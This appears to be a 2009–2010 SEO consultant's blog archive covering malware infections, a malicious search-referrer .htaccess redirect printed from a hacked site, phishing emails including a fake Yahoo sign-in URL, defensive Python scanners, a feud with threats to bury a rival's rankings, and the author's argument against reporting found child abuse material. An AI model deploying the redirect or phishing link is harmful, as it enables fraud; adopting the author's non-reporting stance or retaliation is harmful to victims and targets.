Two weeks ago, House Bill 2463 passed the Oregon House unanimously – 60 to zero – to legally require computer workers to report any discovered child porn. Failure to do so can include a penalty of $6,250, up to a year in jail, or both.
Wow. Well it’s about time they all agreed on something – everybody claims to hate child porn, right? But wait – look at this closely – what does the law actually mean?
Much like many laws passed here in Oregon, I think this is a piece of poorly researched feel-good vote getting activity. It’s not that I’m a fan of child porn, but it should be MY right to make moral decisions about what I do, and the government has no business legislating this particular issue.
Back in 1999, I had a retail computer store and one of my computer techs found a cache of child porn, pretty sick stuff. I wrestled briefly with the morality of the issue but quickly realized it was none of my business.
To the best of my recollection, after (I think @jalbrecht2000 originally found it, and told @ckstanley) I got a quick legal consultation to make sure that some stupid law didn’t exist that could put me in jail for not turning him in, and we returned the computer unfixed, and I talked to him personally. In no uncertain terms I told him why we weren’t fixing it and that he was lucky I didn’t turn him in, and to never come back because he’ll always be “that kiddy porn guy” and he’ll be tormented.
That was how I chose to run my business, and other professionals should be free to run their business without this sort of government intrusion.
This short video is slightly technical at the beginning, but halfway through, I think it’s simplified enough that even a politician can understand why this bill needs MANY further revisions before it gets thrust upon the citizenship of Oregon.
Now what can you do about the issue? PLEASE SHARE this video with someone that you know, so maybe it will draw the attention of the Oregon Senate before it’s too late.
This has been the most technologically devastating week of my life, and I consider myself extremely fortunate. Why “fortunate”? Because I had good backups and only lost two days of my life, instead of suffering permanent damage.
After two days of “fixing”, things are pretty much back to normal, but the time lost over the past three weeks for me, for two others on my team, and for several server admins and web developers is simply astounding. I suppose “wiped out” is a gross exaggeration, but it felt like it, and it could have been a catastrophe without great backups.
Computer Problems Are Not New To Me
Ever since putting my fingers on the keys of a Radio Shack TRS-80, I’ve come across nearly every problem imaginable, from power outages causing data loss, to all of the Windows insanity we’ve experienced in versions 3.x, 95, 98, ME, 2000, XP, Vista and Windows 7.
I’ve had viruses, hardware failures and plenty of human errors, but by the end of around 2002, after five years of doing computer service and networking for a living, I had learned enough about my fragile existence to implement some very efficient and workable backup systems.
After 2002, when I began focusing on Internet marketing and web hosting, and working almost exclusively online, I also had my share of trials and tribulations, and instead of managing just a few websites, we began dealing with dozens, then hundreds, and then thousands.
I think it’s safe to say that it’s been 7 or 8 years since I’ve actually had an active virus or serious problem like this on any computer - (other than my kids, who will download anything!)
But I Got Pwned
For those that aren’t aware, there is an annual contest called Pwn2Own that goes on every year. This year’s contest was held on March 24th, and the “winners” were announced on March 26th, 2010.
Someone in that contest discovered a security hole that allowed script injection through Internet Explorer 8. This meant that simply by visiting a webpage, the user could have their computer used for nearly anything the hacker desired.
The versatility of this injection has no bounds, and here’s a video of the harmless starting of the Windows calculator that was initiated simply by visiting a webpage.
Using this particular exploit, these cybervandals can deliver ANY virus or trojan that they want to, which can make your computer do anything at all.
From wiping your files, to installing a keylogger, or even turning your computer into a zombie spam machine, there’s pretty much nothing they can’t do – nothing.
Who’s Responsible?
Microsoft knew about this hole the very day it was announced, and presumably began working on a fix, but it took nearly 6 weeks, and they didn’t patch it until June 8th, a FULL 6 WEEKS after it was made public. (By contrast, Firefox was patched in 8 days, and Safari was done in 14 days.)
Hackers are able to mobilize a lot faster than Microsoft, and on approximately May 25th, using this particular exploit, I was infected with a brand new virus by visiting a web page in IE 8.
I’m not going to link to the virus, or mention the name because there are dozens of variations now, and it would be pointless, but as a result of that first trojan, here’s what slowly and insidiously happened to me over the course of the past three weeks:
- Stole FTP usernames and passwords
- Spread over network computers
- Stole a credit card number and charged
- Turned a machine into a spam zombie
- Added my email address to dozens of mailing lists – maybe hundreds
- My personal IP address was blacklisted on three spam lists
- Over 40 websites on various servers were hacked
It wasn’t until this past Friday, when the hacked pages started returning AGAIN to certain websites where I KNEW the FTP access had been changed, that I realized I had a much bigger problem – there was an active keylogger on my main machine. Aaggghhh!
What’s a Keylogger?
As the name implies, a keylogger logs your keystrokes and sends them back to the mother ship where sophisticated software algorithms (or vodka swilling jackasses) determine whether they’re credit cards, usernames, passwords or whatever else, then puts them to good evil use.
Throughout the ordeal, multiple other viruses and trojans were added to our systems, and although they were usually caught immediately, the undetected root problem of an open “back door” remained, and there was nothing I could do to get rid of it without formatting and reinstalling.
Before you criticize me for not using what YOU consider to be the “best products” for protection, I’m going to point out that not only did I get it, but so did 7 people I know personally – including two of whom work for me. Each of those 7 people had what they felt was completely “updated and effective protection”.
What’s the moral of the story?
Besides the obvious, which is to use good real-time protection, keep it updated, and keep good backups, my only solution is to plan my vacation for the first week of April each year, right after the Pwn2Own winners are announced.
Seriously, short of not using a computer, there’s NOTHING you can do to protect yourself, so keep your systems cleaned and scanned, and on a regular basis, when you KNOW your system is clean, change your FTP passwords to something highly secure, and keep them on PAPER – not in a file on your computer or saved in your FTP software. Being lazy (like I was) can cause you to do hours upon hours of work.
Either that or… use Macs?
I received a “threatening” email yesterday from Jeremy Wyss at Peak Studios that I just have to share here after posting it last night on Twitter.
Spurred on by ReTweets from internet marketers like Todd Mintz, Greg Boser, Aaron Chronster, David Mihm, Michael Dorausch (OK, sorry, that’s too much work, but here are dozens more) I ended up getting over 500 visitors to my old 2008 post from the Retweets alone in one night.

Now I’m not really the vindictive type, and I’m not always this petty, but God dammit I know when I’m right, and I’m not gonna back down here. Besides, it’s too important that our industry stop “search marketing firms” like this from damaging their clients.
Much like some high profile marketers I know of, like Shoemoney, SugarRae and Michael Gray, I don’t generally like to “call out” other people’s behavior unnecessarily. But when they totally DESERVE it, or they’re complete and total idiots, I’m not afraid to let it rip, and this is one of those times.
Just minutes ago, the “axe fell” and this guy emailed the contact info of a bunch of domains he researched, some of which are my clients, some affiliates, (and some I’ve never even heard of) with a vague, non-specific and unsigned “warning” about me. (Score one for John Andrews here by the way, who told me a couple of years ago I was crazy to keep client references showing on my site. Guess you were right, John.)
A Quick History
Way back in October of 2008, Peak Studios sent some badly spun forum spam for their “search marketing services” to the search marketing forum which I’m a moderator for, over at SEMpdx. I thought it was sort of funny, so I Twittered it.

When I phoned Peak, not only did he not see anything “wrong” with it, he defended it, and didn’t even see the irony. (Anyone that knows me realizes I believe there’s a time and place for spam, but that sure wasn’t it!)
We hung up sort of agreeing to disagree, and I dropped it, thinking “this guy just doesn’t get it”!
A couple hours later, this guy, the owner of Peak Studios, actually then phoned the number on the SEMpdx website and spoke to both Kent Lewis (the past president) AND to Ben Lloyd (the current president), where he DEMANDED that I take down my Tweet or else! Seriously!
When Ben told me, I was so ticked off that I wrote a post over at SEMpdx about the ignorance of the Peak Studios forum spam activity, titling it “Spam is in the Eye of the Beholder”.
Just to clarify, this is the Peak Studios I’m referring to…
That infuriated him of course, and after a few heated emails with the board, Ben informed him that the entire SEMpdx board of directors unanimously voted to leave my post up.
Ya know what he did then?
Instead of apologizing and perhaps looking within, Quince Wyss then turned around and left fake negative reviews on the SEMpdx board member Google local business profiles. And this was AFTER 99% of the internet marketing community pointed out the error of his ways in the comments at Sphinn.
I Lost It
The fake review on my own Google business profile REALLY had me smoked, so I blew up, and phoned him, leaving a screaming and profane voice mail for him that would have made my Dad blush.
What does he do? He edited and cut my voicemail to take out his company name or what I was accusing him of, and anonymously posted it on YouTube, trying to make me look like a raving lunatic. (This “raving lunatic” stuff came as no surprise to my wife or anyone that knows me, because I was REALLY pissed.)
That recorded voicemail on YouTube sparked me to do some investigative digging into their history, so I posted on my own blog in December of 2008 with a backstory and video showing exactly how Peak Studios was leaving deceptive fake “bad” reviews for their clients’ competitors!
I still stand behind that post 100%, and my decision to do it, and I was pretty happy to see that it too was supported by the entire Sphinn community. Even Tamar Weinberg from Techipedia thought it was worth mentioning in the Ultimate Social Media Handbook.
So, now you’re current and up to date, and oh, I forgot to mention that the post is ranking highly for their company name, and that’s why he contacted me yesterday after 14 months with his “threat”.

It’s interesting to note that from his perspective, the fact that Peak Studios spammed SEMpdx in the first place is a total non-issue.
The poorly crafted and badly spun articles posted in a search marketing organization’s forum were bad enough, but the fact that they still defend it (below), and that they left us fake reviews for exposing them, and then were (or still are?) leaving damaging reviews for their clients’ competitors should be very enlightening to other marketers and bloggers in Colorado.
So, instead of being afraid of this supposed “blackmail threat”, I’m sort of proud to have my “clients” read the history here, as well as my family, friends, kids, parents, and anyone I ever have contact with, or may possibly in the future.
Thanks for the link bait Quince and Jeremy, and yes, I do plead guilty of having an ego – but I also have the business sense to understand when I’m wrong, and I’m man enough to admit it when that happens.
Verbatim and unedited, here it is below… (His stuff is red, and mine is blue and of course, read from the bottom up for context.)
This Email went out today to an unknown number of people – Unsigned, by the way, from a Gmail address, with all the typos and grammatical errors you see below-
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Thursday, February 11, 2010 1:03 PM
To: Scott Hendison – Search Commander, Inc.
Subject: Scott hendison is not looking out for your best interests – recommend contacting him to discuss – here are the details
As a consumer I like to work with companies who always think about my best interest. Scott Hendison has been bashing our company for over a year now and when asked to stop he refused cause of his ego. He thinks it is a game or something.
I’d point out that after my December 2008 post, I really did nothing, and had in fact forgotten all about it. There was no “continual bashing” – certainly not like there will be now!
Well we have had just about enough and told him we would not be putting up with it anymore. We had given him 24 hours to remove his post that he claims is about us, unfortunately not all of his information is correct (What about the video proof I have for all of my claims on my original post?) and whenever we tried to respond he would not post it, cause he bashed us on his site and wanted everyone to think he was right (again with his ego).
( I never deleted or declined approval for any of his comments, and do encourage him to speak his mind here. Anyone can vouch for the fact that I love a good argument, and there’s no way I’d delete anything. Why would I? With every sentence they write, it makes them look worse and worse! )
The reason I am telling you this is cause it may have an impact on your company if you continue to work him and he doesn’t remove the requested items. I can only assume that he is well aware of the fact that the negative online reputation that he is getting, from being so negative towards others, will effect his clients eventually. The problem is that his ego makes him believe that his negative smear campaign against another company has no effect on his company or the companies he associates himself with, probably cause of his God complex. Well in todays world people do look at the companies that people choose to do work with as a marker of their professionalism. I for one would not want anyone to associate myself with a person like Scott who would rather hurt his clients than take 10 seconds to remove something.
I would strongly recommend calling him and letting him know that he was hired to look out for your best interests ( not drag your business name through the mud with his) and to remove the items immediately so everyone can go on with their life. In addition, he received this email too and is well aware that I am sending it to you, I guess he really just doesn’t care about his clients.
So that went out to clients, UNSIGNED I’d point out, with no links at all, or an explanation of anything. He even sent it from a cowardly Gmail address. How does this “hurt” me or my clients again? The last threat to SEND that email came from him about an hour before he sent…
From: jeremy@peakstudios.com [mailto:jeremy@peakstudios.com]
Sent: Thursday, February 11, 2010 12:03 PM
To: Scott Hendison – Search Commander, Inc.
Subject: this is going out to your clients in 20 minutes if that stuff isn’t removed… this is step one are you sure you really want this?
this is going out to your clients in 20 minutes if that stuff isn’t removed… this is step one are you sure you really want this?
He had a rough draft here of the letter above, then he thoughtfully, included the entire text in this one email, which made this post easier.
First of all this isn’t Quince, 2nd of all the entire incident occurred cause of a misunderstanding, cause from looking at the sempdx it looked like we were aloud to post things about our company. Unfortunately, there was no disclaimer that said if you are on the board of sempdx please post and reply to people here. I was the one who posted the two blog comments and I never reposted them I edited them. Instead of being an adult and just clicking deleting them you decided to call and argue with Quince. We manage blogs too Scott,it is easy to just click a button or even better you don’t allow posts to go public until reviewed.
You saying I would not work this guy cause of this message is spam as you interpret it on your post, have you read what you wrote on our reviews?
Oh we know what we did towards you was not right I am the first to admit it, but we did it in retaliation for your comments about us on sempdx, your site and google maps along with your little social networking.
finally your vague answer to my question is wonderful, so you don’t care if you negatively effect your clients income.
You can look at it this way is it worth your time and energy to deal with the ramifications it is going to bring to you if you don’t remove it? It will take you ten seconds to remove it and it may hurt your ego a little bit but just think there are still posts bashing us at sempdx so you have won.That is the whole point you want to think you have won right? I can tell you for a fact the only way for you to win is agree your little game is over take your trophy, remove that stuff and move on with your life.
Scott Hendison – Search Commander, Inc. wrote:
You know, you’re probably not a bad guy, but you’re incredibly dense. I phoned you in the first place as a courtesy, one SEO to another, and you just didn’t get it. I TOLD you this would happen, and that I’d end up ranking for your name, but no, you didn’t want to listen.
Now you dare to threaten me with some imaginary loss of income? Are you serious? To retaliate I guess I’d just copy / paste this whole email as a new blog post. Care to bet on how fast I can get an indented listing for your name too? Maybe I’ll ask some friends if they’ll let me guest post on their blogs too, and take up some more page one real estate.
You’re asking ME if I “can’t stand to remove something?” Seriously? Dude, you’re the one that refused to take my voicemail off Youtube, and it cost me time, energy, a little stress, and more than a few bucks to get rid of it myself. (By the way, if you still have a recording, I’d love to have it, and I’ll post it myself)
My whole point is that you’ve never admitted the error of your spammy ways in the first place, and never apologized for the fake reviews you left me, because you still don’t think you did anything wrong.
You even had the balls to register variants of MY NAME with Google and for that alone I should come after you.
http://maps.google.com/maps/user?uid=112369592856088633717&hl=en&gl=us
http://maps.google.com/maps/user?uid=102014840258178979812&hl=en&gl=us&ptab=1
http://maps.google.com/maps/user?uid=103099292697466303277&hl=en&gl=us&ptab=3
http://maps.google.com/maps/user?uid=100424242897549655456&hl=en&gl=us&ptab=0
Not too smart for someone who’s own name .com is still available – (don’t worry, I wouldn’t stoop that low)
Anyway, thanks for sparking some more comments on that year old post today , by the way. Why don’t you just let this die off, before you become even more of a trending topic at Twitter http://search.twitter.com/search?q=peak+studios –
You’d better wise up, quit while you’re behind, and stop pissing me off or I really WILL make it my mission to drive you completely off page one for your own name. Believe me, I’ll find the time, with legitimate facts posted at a few domains, and a few choice links.
Go ahead, dare me to…
Scott
(PS – My apologies to those I’ve annoyed with my bcc, but please let me know if you’d either like to write about this fiasco, or might let me do a guest post in case this guy wants to continue to escalate)
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Wednesday, February 10, 2010 3:20 PM
To: Scott Hendison – Search Commander, Inc.
Subject: Re: page removal – Peak Studios
So you thought about the effects it could have on your income and the income of the businesses you market for? really are you an adult or is your ego so big that you can’t stand to remove something?
Scott Hendison – Search Commander, Inc. wrote:
Gee, what’s wrong? Are you not happy with it ranking highly for your company name?
Do you really think I’ll respond to this by taking it down? Hilarious.
Sorry, but nothing about you on my site is coming down, because nothing there is untrue. Nothing.
I show my facts there pretty well, I believe. Frankly, I’d forgotten all about it, and have better things to do.
Also, NONE of my own Google reviews are anything less than 100% true, including my thoughts on my own dentist, my kids dentist, my kids school, my friend Randy, Marvin the fishing guide who took us fishing, David our mortgage broker since 1999, and so on. I’m not sure what your beef is with my REAL reviews, UNLIKE what you guys were doing - or for all I know still are – that’s what reviews are for! Do you really not comprehend the difference?
Don’t worry, I won’t contact you because I’ve got NO INTEREST in discussing anything with you, however, feel free to comment on the post in question.
Actually, lets see if people think I should remove it or not…
http://twitter.com/shendison/status/8922559578
I’ve also bcc’d the board of SEMpdx (who all remember the situation quite well) in case any of them want to weigh in, and I’m debating placing this email online as another post to outrank you for your company name…
Sincerely,
Scott Hendison
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Wednesday, February 10, 2010 2:16 PM
To: scott@pdxtc.com
Subject: page removal.
You need to remove this page http://www.pdxtc.com/wpblog/viruses-and-scams/peak-studios-actually-harming-clients/ from your website along with the two reviews you and your friend left on peak studios local listings David Kyle reviews and the reviews in your own name within the next 24 hours. This is not a negotiation or discussion the 3 items will be removed within 24 hours. no point in contacting us to discuss we will just make sure it has been done by tomorrow at noon. If you need guidance I would look to your family, friends, the companies listed bellow and god to help you make your decision – I am sure they will lead you in the right direction.
(about 25 domains have been snipped out here for privacy – even though less than half ever were actual clients of mine)
Have a wonderful day and may god bless you!
So, there you have it, and thanks for reading. I’m sorry to waste your time, but this was just too rich to pass up. What do you think? Am I completely out of line?
We just fixed an instance of a domain which appeared fine when visited directly, but when coming from the search results, all users were being redirected.
Because of my recent personal virus experience redirecting my visits from search results I was thrown off at first, but it turned out that all users coming from search engines to that website were being redirected in a completely different way.
I found that the following code was placed in the .htaccess file at the root of the domain:
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http;//sudnijdenprishel.com/gold/go.php?sid=6 [R=301,L]
(* note that I replaced the colon with a semicolon in the above url)
You can see what was happening here. The .htaccess file was either hacked, or came from the web designer’s computer, and it was causing all users referred by any of the search engines listed to be redirected to sudnijdenprishel.com.
I looked up the WHOIS info for sudnijdenprishel.com and found this, showing the domain is brand new:
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 21-Jan-2010
Expiration Date: 21-Jan-2011
Domain servers in listed order:
ns2.jino.ru
ns1.jino.ru
Since my search was being stymied by privacy, I tried looking up WHOIS information for jino.ru :
[Querying whois.ripn.net]
[whois.ripn.net]
By submitting a query to RIPN’s Whois Service
domain: JINO.RU
type: CORPORATE
nserver: ns1.jino.ru. 217.107.34.200
nserver: ns2.jino.ru. 217.107.217.16
nserver: ns3.jino.ru. 217.107.219.170
state: REGISTERED, DELEGATED, VERIFIED
org: Avguro Technologies, Ltd.
phone: +7 495 2293031
fax-no: +7 495 2293031
e-mail: info@jino.ru
e-mail: info@avguro.ru
registrar: R01-REG-RIPN
created: 2002.11.27
paid-till: 2010.11.28
source: TCI
And from there, it’s not worth chasing down further, because I’m not Skyping into Kazakhstan.
Anyway, if users claim they’re being redirected, do these things:
- Check your website .htaccess file
- Scan your computer for any viruses, in case you’re the source in the first place, which is often the case.
- Change your FTP usernames and passwords to good ones (from a clean computer) just in case your password was hacked.
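One way to automate the first check in the list above, as an added example that is not code from the original post: a small Python scanner that walks an .htaccess file, groups each run of RewriteCond lines with the RewriteRule they guard, and reports any rule that tests the referrer and redirects to a host the site does not own. The sample file, the `redirect-target.example` and `example.org` hosts, and the function names are constructed for illustration.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample, modelled on (and shorter than) the injected rules above.
# The redirect target is a placeholder host, not the domain from the post.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*search.*
RewriteRule ^(.*)$ http://redirect-target.example/gold/go.php?sid=6 [R=301,L]

# Legitimate canonical-host redirect: same site, no referrer test
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]

# Hotlink protection: tests the referrer but does not redirect off-site
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !example\.org [NC]
RewriteRule \.(jpg|png)$ - [F]
"""


@dataclass
class Finding:
    line_no: int            # line where the suspicious RewriteRule starts
    target_host: str        # external host the visitor is sent to
    referer_patterns: list  # referrer patterns that trigger the redirect


def _logical_lines(text):
    """Yield (line_no, line), joining backslash continuations, skipping comments."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if start is None:
            start = no
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf and not buf.startswith("#"):
            yield start, buf
        buf, start = "", None


def _is_own(host, own_hosts):
    """True if host is one of the site's own names or a subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in own_hosts)


def find_referer_redirects(text, own_hosts):
    """Return RewriteRules guarded by an HTTP_REFERER test that redirect off-site."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for no, line in _logical_lines(text):
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            # Conditions apply only to the RewriteRule that follows them.
            patterns = [pat for test, pat in conds if "http_referer" in test.lower()]
            conds = []
            host = (urlparse(parts[2]).hostname or "").lower()
            if patterns and host and not _is_own(host, own):
                findings.append(Finding(no, host, patterns))
    return findings


if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE_HTACCESS, {"example.org"}):
        print(f"line {f.line_no}: referrer-conditioned redirect to {f.target_host} "
              f"({len(f.referer_patterns)} referrer patterns)")
```

Run against every .htaccess under the web root, a report from this scanner also tells you which file to restore from backup before changing the FTP passwords.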
I was 45 minutes from leaving for the airport, moving stuff to my laptop, and tying up loose ends before traveling to Affiliate Convention. The last thing I needed was a computer problem.
Update 12/8 – I just got back, and it’s not fixed! Please see the bottom of this post where I’ll continue to add notes about resolution, or to see if I give up
Update 12/8 – all fixed (apparently)
I did a Google site: search for an item at SearchEnginewatch.com to send to a client, but when I clicked the result, instead of the article, I ended up at a different site entirely. Huh?
I hit the “back” button, tried the same SERP listing, and got a different page, almost as if it was randomized. Then I did a Google search for “dog food”, and from the listings, 8 out of 10 results took me somewhere other than my intended destination. Something was REALLY wrong.
That’s when it dawned on me that about 10 minutes earlier, I had a 20 – 30 second lockup while visiting some other website (No, I don’t know which), and my Winpatrol warning went off, asking me, “Do you want to add this item to your Windows Startup?” Although I said “No” apparently something slipped by, and my Firefox was screwed.
Running out of time before leaving, I opened Internet Explorer, assuming it would be fine. Did a site: search at Google, and my SERPS had been hijacked in IE too.
I began running Malware Bytes, a process that would take a couple of hours, and used my laptop to Tweet out a message, where @DavidKyle replied with a link to “Hijack This” which allows you to see registry additions.
After spending 10 minutes in Hijack This checking boxes for things I KNEW were fine, I added them to the “ignore” list, and was left with a couple dozen items to examine, but this was right at the top -

I browsed to my registry path, and yep, there it was, an IP address entered for proxy use.
In case you don’t know, a proxy allows you to surf the web by going through their IP address. Reasons for CHOOSING to use a proxy vary, but in this case, it looked like the owner of the proxy IP was forcing me to go elsewhere, to other websites.
I looked up the owner of the IP address at Domain Tools, and it turned out to be owned by the University of Washington. Great – some bored kid, using the school’s resources to deliver who knows what sort of crap to my PC.
I decided to let Malware Bytes continue to run rather than make any attempt at fixing it, and I left for the airport, dwelling on it all the way there.
As soon as I made it past security, I logged in remotely to see if the Malware Byte scan had finished, and it hadn’t. Not only that, but it hadn’t found anything out of the norm, either.
So, rather than use HiJack This to “fix” the problem by removing the registry entry, I decided to open Internet Explorer and went to the Proxy settings, where I saw the offending entry.

The box was NOT checked to use a Proxy, however, I could see the offending IP in the grayed out section.
All I had to do was check the box, delete the IP and port entries, hit OK, and then UNcheck the box again. I did a quick search at Google, and the problem was gone – Nice.
I can’t say for sure that this fixed everything, and I’ll likely have to get into Firefox and do the same thing, but I’ll bet dollars to donuts that’s it.
I was running IE8 and FF3, both patched with the absolute latest security fixes. I have a firewall, AntiVirus, and a startup protector that SHOULD have prevented this problem. Apparently, we’re not as safe as we like to think.
I’m writing this on the plane, but I’ll post it with screen shots when I get in later today – (right after I see if proxyaffiliatemarketing.com is available for registration)
*Update – 12/07 8am
After returning to Portland home and getting back to work this morning, my clicks into SERPS were still not coming up correctly 100% of the time, so I ran “Hijack This” again, and removed the offending entries that way. I’m sure I might have been able to solve it with enough time, but I really don’t have it to spare. All seems AOK now.
*Update – 12/07 noon
Back in serps after email catchup, and.. Agghh – it’s back. My registry seems clean, the Hijack This logs still show clean, but I’m still being redirected about 10% of the time, even after a reboot.
To be clear, here’s what I’ve done:
- Removed the obvious problem using Hijack This
- Manually verified removal from the registry
- Found over a dozen places undergoing troubleshooting
- Found one sales pitch disguised as a solution at Ezine Articles
- Using Google Wonder Wheel and Twitter Search but still found nothing concrete
to be continued…
12/8 -
Thanks to my Twitter search, I found someone who says below that Combofix worked for them, so I tried it from the only authorized US source for Combofix. Although the entire process took more than two hours to run, in the end, I came out clean, and today I’m back to work. Hooray!
Read (and print) these instructions carefully throughout the process
There seems to be a new scam going around, that’s a new twist on an old game.
The old scams set out to steal your domain names under the banner of “Liberty names of America” or “Domain Registry of America”, and the way they do it is to send domain owners what appears to be an invoice for domain registration renewal.
Once paid, the owners lose control of their domain names, often not finding out for months or years, until they need to change DNS, and that’s when they find out they don’t own it anymore.
This morning I got another e-mail that appeared to be the same thing, but upon closer examination, I can see that they don’t want to be bothered by anything as pesky as owning your domain name, and they have no intention of robbing you year after year.
Instead, this one is merely a solicitation for “search engine registration” and they’re after one thing – your money.
If you read the fine print carefully you’ll see that…
- “This is not an invoice”
- It’s for “Search Engine Registation”
- It’s a “solicitation”
- “This notice is not in any part is associated with a continuation of services for domain registration.”
At least you won’t lose your domain if you fall for this scam, but you will lose up to $295. Here’s what to watch for, by email, with the subject line – “Domain Notification: [sic YOUR NAME] This is your Final Notice of Domain Listing [sic Your Domain Name]”
Here’s what the letter contains…
I suppose someone will argue that since they DO specify details, that it’s not a scam, but seriously – “search engine registration”? Really?
If someone from the company would like to reply here and tell people what they do get for their $300, I’ll certainly allow it to be posted…
Did you get a Twitter message that says this? rofl – this you on here? – Then that’s followed by a link to see a video, but it appears as if you’re suddenly logged out of Twitter? Don’t be fooled and DON’T log in!
It’s a Twitter phishing scam to get your password, and then to spam your own followers, to get their passwords!
If you’ve already fallen for it, don’t feel too bad, just go and change your password right away.
If you haven’t fallen for it, then please retweet this, and tell your friends to watch out also, because it could get really ugly pretty fast.
If this isn’t perfectly clear to you, watch the video below…
In light of recent news about Microsoft and Yahoo search, I almost fell for this bogus e-mail, which is a phishing expedition for usernames and passwords.
The fact that I’ve been advertising an affiliate offer heavily in Yahoo Sponsored Search over the past three weeks, and the fact that I just read about a new user interface coming soon, put Yahoo in the forefront of my mind.
It was only at the last second that I caught a glimmer of potential fraud – and sure enough, it’s a scam. Note the domain name is NOT Yahoo, but that won’t show up in the .html version of the email.
Dear Advertiser,
We just want to remind you that, on August 25, 2009, your Local Sponsored Search account will be discontinued. You will be upgraded to a new Sponsored Search account with geo-targeting and other great new features.
Please note the following: In order for us to upgrade your account you need to verify your user/password of your account. Please remember to input your Sponsored Search user and password correctly NOT your email and password.
Please visit the following link to verify your account:
http://marketingsolutions-yahoo.com/adui/signin/loadSignin.htm
Sincerely,
Your Partners at Yahoo! Search Marketing Copyright 2009 Yahoo!, Inc. All rights reserved.
Had I been just a few seconds slower on the uptake, I probably would have found myself with dozens or hundreds of ad campaigns for someone else’s domains, and maxed out credit cards. Yikes!
I looked up the domain name just to be sure…
Any time your credit card or finances are even remotely involved, never, ever, should you click on a link in an email where you are being asked to verify your username and password for ANYTHING.
If in doubt, always manually type in the domain name of the real merchant or go to your bookmark / favorite to see if a request is legit.
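The check that caught this email (the link's real host is not Yahoo, even though the HTML view hides that) can be automated. The following is an added example, not part of the original post: the trusted-domain list and the sample email body are constructed for illustration, with the link target taken from the email quoted above and the visible link text assumed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the domains the recipient really does business with.
TRUSTED_DOMAINS = {"yahoo.com"}

# Constructed sample: the href is the one quoted in the post, the visible text is assumed.
SAMPLE_EMAIL = """
<p>Please visit the following link to verify your account:</p>
<a href="http://marketingsolutions-yahoo.com/adui/signin/loadSignin.htm">searchmarketing.yahoo.com</a>
<a href="https://login.yahoo.com/">Sign in</a>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML email body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased hostname of a URL, or '' if it cannot be parsed."""
    try:
        return (urlsplit(url).hostname or "").lower().rstrip(".")
    except ValueError:
        return ""


def is_trusted_host(host):
    """True only for a trusted domain itself or a real subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def audit_links(html_body):
    """Return one finding per link with the real host and the reasons it looks wrong."""
    parser = LinkCollector()
    parser.feed(html_body)
    brands = {d.split(".")[0] for d in TRUSTED_DOMAINS}
    findings = []
    for href, text in parser.links:
        host = host_of(href)
        reasons = []
        if not is_trusted_host(host):
            reasons.append("host is not a trusted domain")
            if any(b in host for b in brands):
                reasons.append("brand name used inside a different domain")
        # Visible text that is itself a host name or URL, but not the one the link opens
        if text and " " not in text and "." in text:
            shown = host_of(text if "://" in text else "//" + text)
            if shown and shown != host:
                reasons.append("visible text shows a different host than the link")
        findings.append({"host": host, "text": text,
                         "suspicious": bool(reasons), "reasons": reasons})
    return findings
```

The suffix match uses a leading dot on purpose: `marketingsolutions-yahoo.com` ends in `yahoo.com` as a string, but it is a separate registered domain, not a subdomain of Yahoo.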
In the fall of 2008, a Portland Oregon small business owner found a local developer, and told him that she’d like to have her website redone, and she wanted some search visibility.
Her current site was old, not showing in the results, and she’d lost track of the original web designer.
So, after a few emails, phone calls and meetings, she signed a contract for $1500 down and about 6k over 6 months, after which she assumed she would have a new optimized website, and they would part ways. What she got though, was something completely different.
